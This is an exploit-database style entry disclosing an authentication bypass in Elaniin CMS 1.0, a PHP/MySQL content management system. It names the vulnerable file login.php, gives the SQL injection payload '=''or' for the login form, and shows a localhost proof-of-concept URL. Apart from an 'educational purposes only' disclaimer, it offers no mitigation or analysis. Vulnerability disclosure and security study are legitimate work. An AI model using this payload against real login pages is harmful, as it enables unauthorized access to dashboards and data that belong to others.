Exploits / Vulnerability Discovered : 2020-01-06 |
Type : webapps |
Platform : php
This exploit / vulnerability Elaniin cms 1.0 authentication bypass is for educational purposes only and if it is used you will do on your own risk!
# Discription:
# Open-source Content Management System created with PHP + MySQL https://elaniin.com/
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/elaniin/login.php